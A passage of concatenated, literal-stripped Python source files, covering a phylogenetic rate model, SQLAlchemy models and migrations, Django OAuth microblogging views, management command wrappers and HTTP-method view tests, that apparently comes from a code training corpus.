"<STR_LIT>" ) <EOL> if type ( self . k_gamma ) is not int : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> rv = gamma ( self . alpha , scale = <NUM_LIT:1.> / self . alpha ) <EOL> freqK = np . zeros ( self . k_gamma ) <EOL> rK = np . zeros ( self . k_gamma ) <EOL> for i in range ( self . k_gamma - <NUM_LIT:1> ) : <EOL> raw = rv . ppf ( ( i + <NUM_LIT:1.> ) / self . k_gamma ) <EOL> freqK [ i ] = gammainc ( self . alpha + <NUM_LIT:1> , raw * self . alpha ) <EOL> rK [ <NUM_LIT:0> ] = freqK [ <NUM_LIT:0> ] * self . k_gamma <EOL> rK [ self . k_gamma - <NUM_LIT:1> ] = ( <NUM_LIT:1> - freqK [ self . k_gamma - <NUM_LIT:2> ] ) * self . k_gamma <EOL> for i in range ( <NUM_LIT:1> , self . k_gamma - <NUM_LIT:1> ) : <EOL> rK [ i ] = self . k_gamma * ( freqK [ i ] - freqK [ i - <NUM_LIT:1> ] ) <EOL> if self . pinv <= ZERO : <EOL> self . rate_probs = np . repeat ( <NUM_LIT:1.> / self . k_gamma , self . k_gamma ) <EOL> self . rate_factors = deepcopy ( rK ) <EOL> else : <EOL> freqK *= ( <NUM_LIT:1.> - self . pinv ) <EOL> freqK = list ( freqK ) <EOL> freqK . append ( self . pinv ) <EOL> self . rate_probs = np . array ( freqK ) <EOL> rK = list ( rK ) <EOL> rK . append ( <NUM_LIT:0.> ) <EOL> self . rate_factors = np . array ( rK ) <EOL> def _assign_rate_probs ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . hetcodon_model : <EOL> num_probs = len ( self . params [ "<STR_LIT>" ] ) <EOL> else : <EOL> num_probs = len ( self . rate_factors ) <EOL> if self . rate_probs is None : <EOL> self . rate_probs = np . repeat ( <NUM_LIT:1.> / num_probs , num_probs ) <EOL> assert ( abs ( <NUM_LIT:1.> - np . sum ( self . rate_probs ) ) <= ZERO ) , "<STR_LIT>" <EOL> try : <EOL> self . rate_probs = np . array ( self . rate_probs ) <EOL> except : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> assert ( len ( self . rate_probs ) == num_probs ) , "<STR_LIT>" <EOL> def _sanity_rate_factors ( self ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> self . rate_factors = np . array ( self . rate_factors ) <EOL> except : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if abs ( <NUM_LIT:1.> - np . sum ( self . rate_probs * self . rate_factors ) ) > ZERO : <EOL> self . rate_factors /= np . sum ( self . rate_factors * self . rate_probs ) <EOL> def num_classes ( self ) : <EOL> '''<STR_LIT>''' <EOL> return len ( self . rate_probs ) <EOL> def assign_name ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> self . name = name <EOL> def is_hetcodon_model ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . hetcodon_model <EOL> def extract_mutation_rates ( self ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> return self . params [ "<STR_LIT>" ] <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> def extract_rate_matrix ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . matrix <EOL> def extract_state_freqs ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . params [ "<STR_LIT>" ] <EOL> def extract_parameters ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . params </s>
<s> from raggregate . models import * <EOL> import sqlalchemy <EOL> from sqlalchemy import Column <EOL> from sqlalchemy import UnicodeText <EOL> from sqlalchemy import DateTime <EOL> from sqlalchemy import ForeignKey <EOL> from raggregate . guid_recipe import GUID <EOL> import datetime <EOL> class Notify ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( GUID , primary_key = True ) <EOL> user_id = Column ( GUID , ForeignKey ( '<STR_LIT>' ) ) <EOL> target_id = Column ( GUID ) <EOL> target_type = Column ( UnicodeText ) <EOL> added_on = Column ( DateTime ) <EOL> added_by = Column ( GUID , ForeignKey ( '<STR_LIT>' ) ) <EOL> def __init__ ( self , user_id = None , target_id = None , target_type = None , <EOL> added_on = None , added_by = None ) : <EOL> self . user_id = user_id <EOL> self . target_id = target_id <EOL> self . target_type = target_type <EOL> self . added_by = added_by <EOL> if added_on : <EOL> self . added_on = added_on <EOL> else : <EOL> self . added_on = datetime . datetime . utcnow ( ) </s>
<s> from sqlalchemy import * <EOL> from migrate import * <EOL> from raggregate . guid_recipe import GUID <EOL> def upgrade ( migrate_engine ) : <EOL> meta = MetaData ( bind = migrate_engine ) <EOL> comments = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> unreadc = Column ( '<STR_LIT>' , Boolean , default = True ) <EOL> in_reply_toc = Column ( '<STR_LIT>' , GUID , nullable = True ) <EOL> unreadc . create ( comments ) <EOL> in_reply_toc . create ( comments ) <EOL> def downgrade ( migrate_engine ) : <EOL> meta = MetaData ( bind = migrate_engine ) <EOL> comments = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> comments . c . unread . drop ( ) <EOL> comments . c . in_reply_to . drop ( ) </s>
<s> import os <EOL> import sys <EOL> from setuptools import setup , find_packages <EOL> here = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> README = open ( os . path . join ( here , '<STR_LIT>' ) ) . read ( ) <EOL> CHANGES = open ( os . path . join ( here , '<STR_LIT>' ) ) . read ( ) <EOL> requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if sys . version_info [ : <NUM_LIT:3> ] < ( <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:0> ) : <EOL> requires . append ( '<STR_LIT>' ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = README + '<STR_LIT>' + CHANGES , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> keywords = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> test_suite = '<STR_LIT>' , <EOL> install_requires = requires , <EOL> entry_points = """<STR_LIT>""" , <EOL> paster_plugins = [ '<STR_LIT>' ] , <EOL> dependency_links = [ '<STR_LIT>' ] <EOL> ) </s>
<s> from os import path <EOL> import os <EOL> import shutil , sys <EOL> import ConfigParser <EOL> import log , util <EOL> import traceback <EOL> PKG_PATH = path . dirname ( __file__ ) <EOL> APP_PATH = path . join ( PKG_PATH , "<STR_LIT>" ) <EOL> USER_PATH = path . join ( os . getenv ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> SAMPLE_CONF = path . join ( PKG_PATH , '<STR_LIT>' , '<STR_LIT>' ) <EOL> SAMPLE_DB = path . join ( PKG_PATH , '<STR_LIT>' , '<STR_LIT>' ) <EOL> CONF_FILE = path . join ( USER_PATH , "<STR_LIT>" ) <EOL> HIST_DB = path . join ( USER_PATH , "<STR_LIT>" ) <EOL> LANG = '<STR_LIT>' <EOL> CHINA_PROXY_HTTP = None <EOL> XIAMI_LOGIN_EMAIL = None <EOL> XIAMI_LOGIN_PASSWORD = None <EOL> LOG_LVL_FILE = '<STR_LIT>' <EOL> LOG_LVL_CONSOLE = '<STR_LIT>' <EOL> THREAD_POOL_SIZE = <NUM_LIT:3> <EOL> DOWNLOAD_DIR = '<STR_LIT>' <EOL> SHOW_DONE_NUMBER = <NUM_LIT:5> <EOL> DOWNLOAD_TOP_SONG = <NUM_LIT:10> <EOL> var_dict = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:p>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:n>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:n>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:n>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) <EOL> } <EOL> def load_single_config ( conf_parser , conf_key ) : <EOL> config_warn_msg = "<STR_LIT>" <EOL> try : <EOL> v = conf_parser . get ( '<STR_LIT>' , conf_key ) <EOL> if not v : <EOL> raise Exception ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> gkey = var_dict [ conf_key ] [ <NUM_LIT:0> ] <EOL> ty = var_dict [ conf_key ] [ <NUM_LIT:1> ] <EOL> if ty == '<STR_LIT:n>' : <EOL> globals ( ) [ gkey ] = int ( v ) <EOL> else : <EOL> if ty == '<STR_LIT:p>' : <EOL> util . create_dir ( v ) <EOL> globals ( ) [ gkey ] = v <EOL> except : <EOL> if not conf_key . find ( '<STR_LIT>' ) : <EOL> log . warn ( config_warn_msg % ( conf_key , str ( globals ( ) [ var_dict [ conf_key ] [ <NUM_LIT:0> ] ] ) ) ) <EOL> def load_config ( ) : <EOL> if not path . exists ( CONF_FILE ) : <EOL> init_config ( ) <EOL> if not path . exists ( HIST_DB ) : <EOL> init_history_db ( ) <EOL> cf = ConfigParser . ConfigParser ( ) <EOL> cf . read ( CONF_FILE ) ; <EOL> for k in var_dict : <EOL> load_single_config ( cf , k ) <EOL> def init_history_db ( ) : <EOL> """<STR_LIT>""" <EOL> shutil . copy ( SAMPLE_DB , HIST_DB ) <EOL> def init_config ( ) : <EOL> """<STR_LIT>""" <EOL> os . makedirs ( USER_PATH ) <EOL> shutil . copy ( SAMPLE_CONF , CONF_FILE ) </s>
<s> from django . template import RequestContext <EOL> from django . http import HttpResponseRedirect , Http404 , HttpResponse <EOL> from django . shortcuts import render_to_response , get_object_or_404 <EOL> from django . db import models <EOL> from django . conf import settings <EOL> from django . contrib . sites . models import Site <EOL> from django . contrib . auth . models import User <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . core . urlresolvers import reverse <EOL> from omb . forms import RemoteSubscribeForm , AuthorizeForm <EOL> from omb import oauthUtils , oauthConsumer , OAUTH_REQUEST , OAUTH_ACCESS , OMB_POST_NOTICE , OMB_UPDATE_PROFILE , OAUTH_AUTHORIZE , OMB_VERSION_01 <EOL> from omb . models import RemoteProfile <EOL> from oauth . oauth import OAuthRequest , OAuthServer , OAuthSignatureMethod_HMAC_SHA1 , OAuthSignatureMethod_PLAINTEXT , OAuthError <EOL> from oauth_provider . stores import DataStore <EOL> from oauth_provider . views import request_token , user_authorization <EOL> from oauth_provider . models import Consumer <EOL> import urllib <EOL> signature_methods = { <EOL> OAuthSignatureMethod_HMAC_SHA1 ( ) . get_name ( ) : OAuthSignatureMethod_HMAC_SHA1 ( ) , <EOL> OAuthSignatureMethod_PLAINTEXT ( ) . get_name ( ) : OAuthSignatureMethod_PLAINTEXT ( ) <EOL> } <EOL> def follow ( request ) : <EOL> if request . method == "<STR_LIT:GET>" : <EOL> form = RemoteSubscribeForm ( initial = { '<STR_LIT:username>' : request . GET . get ( '<STR_LIT:username>' ) } ) <EOL> else : <EOL> current_site = Site . objects . get_current ( ) <EOL> form = RemoteSubscribeForm ( request . POST ) <EOL> if form . is_valid ( ) : <EOL> user = User . objects . get ( username = form . cleaned_data [ '<STR_LIT:username>' ] ) <EOL> omb = oauthUtils . getServices ( form . cleaned_data [ '<STR_LIT>' ] ) <EOL> token = oauthConsumer . requestToken ( omb ) <EOL> oauthRequest = oauthConsumer . requestAuthorization ( token , omb [ OAUTH_AUTHORIZE ] . uris [ <NUM_LIT:0> ] . uri , omb [ OAUTH_REQUEST ] . localid . text , user ) <EOL> omb_session = { <EOL> '<STR_LIT>' : user . username , <EOL> '<STR_LIT>' : omb [ OAUTH_REQUEST ] . localid . text , <EOL> '<STR_LIT>' : token . key , <EOL> '<STR_LIT>' : token . secret , <EOL> '<STR_LIT>' : omb [ OAUTH_ACCESS ] . uris [ <NUM_LIT:0> ] . uri , <EOL> '<STR_LIT>' : omb [ OMB_POST_NOTICE ] . uris [ <NUM_LIT:0> ] . uri , <EOL> '<STR_LIT>' : omb [ OMB_UPDATE_PROFILE ] . uris [ <NUM_LIT:0> ] . uri , <EOL> } <EOL> request . session [ '<STR_LIT>' ] = omb_session <EOL> return HttpResponseRedirect ( oauthRequest . to_url ( ) ) <EOL> return render_to_response ( '<STR_LIT>' , { '<STR_LIT>' : form } ) <EOL> def finish_follow ( request ) : <EOL> omb_session = request . session [ '<STR_LIT>' ] <EOL> oauth_request = OAuthRequest . from_request ( request . method , request . build_absolute_uri ( ) , headers = request . META ) <EOL> accessToken = oauthConsumer . requestAccessToken ( omb_session , oauth_request ) <EOL> try : <EOL> remote_profile = RemoteProfile . objects . get ( uri = omb_session [ "<STR_LIT>" ] ) <EOL> except : <EOL> remote_profile = RemoteProfile ( ) <EOL> remote_profile . username = oauth_request . get_parameter ( "<STR_LIT>" ) <EOL> remote_profile . uri = omb_session [ "<STR_LIT>" ] <EOL> remote_profile . url = oauth_request . get_parameter ( '<STR_LIT>' ) <EOL> remote_profile . avatar = oauth_request . get_parameter ( '<STR_LIT>' ) <EOL> remote_profile . post_notice_url = omb_session [ "<STR_LIT>" ] <EOL> remote_profile . update_profile_url = omb_session [ "<STR_LIT>" ] <EOL> remote_profile . token = accessToken . key <EOL> remote_profile . secret = accessToken . secret <EOL> remote_profile . save ( ) <EOL> user = User . objects . get ( username = omb_session [ '<STR_LIT>' ] ) <EOL> app_label , model_name = settings . OMB_FOLLOWING_MODULE . split ( '<STR_LIT:.>' ) <EOL> model = models . get_model ( app_label , model_name ) <EOL> following = model ( ) <EOL> following . followed_content_object = user <EOL> following . follower_content_object = remote_profile <EOL> following . save ( ) <EOL> return HttpResponseRedirect ( user . get_absolute_url ( ) ) <EOL> def post_notice ( request ) : <EOL> current_site = Site . objects . get_current ( ) <EOL> oauth_req = OAuthRequest . from_request ( request . method , request . build_absolute_uri ( ) , headers = request . META , parameters = request . POST . copy ( ) ) <EOL> if not oauth_req : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> else : <EOL> oauth_server = OAuthServer ( data_store = DataStore ( oauth_req ) , signature_methods = signature_methods ) <EOL> oauth_server . verify_request ( oauth_req ) <EOL> version = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> if version != OMB_VERSION_01 : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> listenee = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> try : <EOL> remote_profile = RemoteProfile . objects . get ( uri = listenee ) <EOL> except ObjectDoesNotExist : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> content = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> if not content or len ( content ) > <NUM_LIT> : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> notice_uri = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> notice_url = oauth_req . get_parameter ( "<STR_LIT>" ) <EOL> notice_app_label , notice_model_name = settings . OMB_NOTICE_MODULE . split ( '<STR_LIT:.>' ) <EOL> noticeModel = models . get_model ( notice_app_label , notice_model_name ) <EOL> notice = noticeModel ( ) <EOL> notice . sender = remote_profile <EOL> notice . text = content <EOL> notice . save ( ) <EOL> return HttpResponse ( "<STR_LIT>" % OMB_VERSION_01 , mimetype = "<STR_LIT>" ) <EOL> def updateprofile ( request ) : <EOL> oauth_req = OAuthRequest . from_request ( request . method , request . build_absolute_uri ( ) , headers = request . META , parameters = request . POST . copy ( ) ) <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> if not oauth_req : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> else : <EOL> oauth_server = OAuthServer ( data_store = DataStore ( oauth_req ) , signature_methods = signature_methods ) <EOL> oauth_server . verify_request ( oauth_req ) <EOL> omb_version = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> if omb_version != OMB_VERSION_01 : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> omb_listenee = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> try : <EOL> remote_profile = RemoteProfile . objects . get ( uri = omb_listenee ) <EOL> omb_listenee_profile = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_profile != None : <EOL> remote_profile . url = omb_listenee_profile <EOL> omb_listenee_nickname = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_nickname != None : <EOL> remote_profile . username = omb_listenee_nickname <EOL> omb_listenee_license = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_license != None : <EOL> remote_profile . license = omb_listenee_license <EOL> omb_listenee_fullname = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_fullname != None : <EOL> remote_profile . fullname = omb_listenee_fullname <EOL> omb_listenee_homepage = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_homepage != None : <EOL> remote_profile . homepage = omb_listenee_homepage <EOL> omb_listenee_bio = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_bio != None : <EOL> remote_profile . bio = omb_listenee_bio <EOL> omb_listenee_location = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_location != None : <EOL> remote_profile . location = omb_listenee_location <EOL> omb_listenee_avatar = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_avatar != None : <EOL> remote_profile . avatar = omb_listenee_avatar <EOL> remote_profile . save ( ) <EOL> return HttpResponse ( "<STR_LIT>" % OMB_VERSION_01 , mimetype = "<STR_LIT>" ) <EOL> except ObjectDoesNotExist : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> def _get_oauth_param ( oauth_req , field_name ) : <EOL> try : <EOL> return oauth_req . get_parameter ( field_name ) <EOL> except OAuthError : <EOL> return None <EOL> def xrds ( request , username ) : <EOL> current_site = Site . objects . get_current ( ) <EOL> other_user = get_object_or_404 ( User , username = username ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : current_site . domain , "<STR_LIT>" : other_user } , mimetype = "<STR_LIT>" , context_instance = RequestContext ( request ) ) <EOL> def omb_request_token ( request ) : <EOL> consumer_key = request . REQUEST . get ( "<STR_LIT>" ) <EOL> try : <EOL> Consumer . objects . get ( name = consumer_key , key = consumer_key ) <EOL> except ObjectDoesNotExist : <EOL> Consumer . objects . create ( name = consumer_key , key = consumer_key ) <EOL> response = request_token ( request ) <EOL> return response <EOL> def authorize ( request ) : <EOL> if request . method == "<STR_LIT:GET>" : <EOL> return user_authorization ( request ) <EOL> else : <EOL> current_site = Site . objects . get_current ( ) <EOL> user_profile_url = "<STR_LIT>" % ( current_site . domain , reverse ( '<STR_LIT>' , args = [ request . user . username ] ) ) <EOL> response = user_authorization ( request ) <EOL> if type ( response ) == HttpResponseRedirect : <EOL> try : <EOL> remote_profile = RemoteProfile . objects . get ( uri = request . GET . get ( "<STR_LIT>" ) ) <EOL> except : <EOL> remote_profile = RemoteProfile ( ) <EOL> remote_profile . username = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . uri = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . url = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . license = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . fullname = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . homepage = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . bio = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . location = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . avatar = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . save ( ) <EOL> app_label , model_name = settings . OMB_FOLLOWING_MODULE . split ( '<STR_LIT:.>' ) <EOL> following_model = models . get_model ( app_label , model_name ) <EOL> following = following_model ( ) <EOL> following . followed_content_object = remote_profile <EOL> following . follower_content_object = request . user <EOL> following . save ( ) <EOL> location = response [ '<STR_LIT>' ] <EOL> params = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : request . user . username , <EOL> "<STR_LIT>" : user_profile_url , <EOL> } <EOL> if location . find ( "<STR_LIT:?>" ) > - <NUM_LIT:1> : <EOL> location += "<STR_LIT>" % urllib . urlencode ( params ) <EOL> else : <EOL> location += "<STR_LIT>" % urllib . urlencode ( params ) <EOL> response [ '<STR_LIT>' ] = location <EOL> return response <EOL> def oauth_authorize ( request , token , callback , params ) : <EOL> if request . method == "<STR_LIT:GET>" : <EOL> form = AuthorizeForm ( { <EOL> '<STR_LIT>' : token . key , <EOL> } ) <EOL> context_vars = { <EOL> "<STR_LIT>" : form , <EOL> "<STR_LIT:username>" : request . GET . get ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : request . GET . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : request . GET . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT:location>" : request . GET . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : request . GET . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : request . META . get ( "<STR_LIT>" ) <EOL> } <EOL> else : <EOL> form = AuthorizeForm ( request . POST ) <EOL> print request . POST <EOL> return render_to_response ( "<STR_LIT>" , context_vars , context_instance = RequestContext ( request ) ) </s>
<s> class Menu : <EOL> def __init__ ( self , rdoc , on_add = None ) : <EOL> self . rdoc = rdoc <EOL> self . element = rdoc . element ( '<STR_LIT>' ) <EOL> vn = '<STR_LIT:#>' + self . element . varname <EOL> self . rule_menu = rdoc . stylesheet . rule ( vn ) <EOL> self . rule_item = rdoc . stylesheet . rule ( vn + '<STR_LIT>' ) <EOL> self . rule_item_hover = rdoc . stylesheet . rule ( vn + '<STR_LIT>' ) <EOL> self . rule_item_selected = rdoc . stylesheet . rule ( vn + '<STR_LIT>' ) <EOL> self . rule_item_selected_hover = rdoc . stylesheet . rule ( vn + '<STR_LIT>' ) <EOL> self . on_add = on_add <EOL> self . id_dict = { } <EOL> def add_item ( self , * varargs ) : <EOL> for text in varargs : <EOL> i = self . rdoc . element ( '<STR_LIT>' , text ) <EOL> self . id_dict [ i . att . varname ] = i <EOL> self . element . append ( i ) <EOL> if self . on_add : <EOL> self . on_add ( i ) </s>
<s> from commando import management <EOL> BaseHaystackInfoCommand = management . get_command_class ( <EOL> "<STR_LIT>" , exclude_packages = ( "<STR_LIT>" , ) ) <EOL> if BaseHaystackInfoCommand is not None : <EOL> base = BaseHaystackInfoCommand ( ) <EOL> class HaystackInfoCommandOptions ( management . CommandOptions ) : <EOL> """<STR_LIT>""" <EOL> args = base . args <EOL> help = base . help <EOL> option_list = base . option_list [ <EOL> len ( management . BaseCommandOptions . option_list ) : ] <EOL> option_groups = ( <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> option_list , <EOL> ) , ) if option_list else ( ) <EOL> actions = ( "<STR_LIT>" , ) <EOL> def handle_haystack_info ( self , * args , ** options ) : <EOL> return self . call_command ( "<STR_LIT>" , * args , ** options ) <EOL> class HaystackInfoCommand ( HaystackInfoCommandOptions , management . StandardCommand ) : <EOL> """<STR_LIT>""" <EOL> option_list = management . StandardCommand . option_list <EOL> option_groups = HaystackInfoCommandOptions . option_groups + management . StandardCommand . option_groups <EOL> else : <EOL> HaystackInfoCommand = management . StandardCommand </s>
<s> from . . clearsessions import ClearSessionsCommand as Command </s>
<s> from . . sqlcustom import SQLCustomCommand as Command </s>
<s> from commando import management <EOL> BaseSQLSequenceResetCommand = management . get_command_class ( <EOL> "<STR_LIT>" , exclude_packages = ( "<STR_LIT>" , ) ) <EOL> if BaseSQLSequenceResetCommand is not None : <EOL> base = BaseSQLSequenceResetCommand ( ) <EOL> class SQLSequenceResetCommandOptions ( management . CommandOptions ) : <EOL> """<STR_LIT>""" <EOL> args = base . args <EOL> help = base . help <EOL> option_list = base . option_list [ <EOL> len ( management . BaseCommandOptions . option_list ) : ] <EOL> option_groups = ( <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> option_list , <EOL> ) , ) if option_list else ( ) <EOL> actions = ( "<STR_LIT>" , ) <EOL> def handle_sqlsequencereset ( self , * args , ** options ) : <EOL> return self . call_command ( "<STR_LIT>" , * args , ** options ) <EOL> class SQLSequenceResetCommand ( SQLSequenceResetCommandOptions , management . StandardCommand ) : <EOL> """<STR_LIT>""" <EOL> option_list = management . StandardCommand . option_list <EOL> option_groups = SQLSequenceResetCommandOptions . option_groups + management . StandardCommand . option_groups <EOL> else : <EOL> SQLSequenceResetCommand = management . StandardCommand </s>
<s> from __future__ import unicode_literals <EOL> from django . test import client <EOL> from daydreamer . core import handlers <EOL> class ClientHandler ( client . ClientHandler , handlers . base . Handler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ClientHandler , self ) . __init__ ( * args , ** kwargs ) <EOL> self . last_request = None <EOL> @ property <EOL> def last_request ( self ) : <EOL> return self . _last_request <EOL> @ last_request . setter <EOL> def last_request ( self , request ) : <EOL> self . _last_request = request <EOL> def get_response ( self , request ) : <EOL> self . last_request = request <EOL> return super ( ClientHandler , self ) . get_response ( request ) </s>
<s> from __future__ import unicode_literals <EOL> import datetime <EOL> from daydreamer . views import generic <EOL> from daydreamer . views . behaviors import http <EOL> from . import base <EOL> class RequireGETTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> view_classes = ( http . RequireGET , generic . View , ) <EOL> def test_get_allowed ( self ) : <EOL> """<STR_LIT>""" <EOL> content = self . unique ( ) <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : content } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content ) <EOL> def test_head_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_options_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_post_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_put_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_delete_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> class RequirePOSTTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> view_classes = ( http . RequirePOST , generic . View , ) <EOL> def test_post_allowed ( self ) : <EOL> """<STR_LIT>""" <EOL> content = self . unique ( ) <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : content } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content ) <EOL> def test_get_allowed ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> status_code = <NUM_LIT> ) <EOL> def test_head_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_options_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_put_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_delete_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method 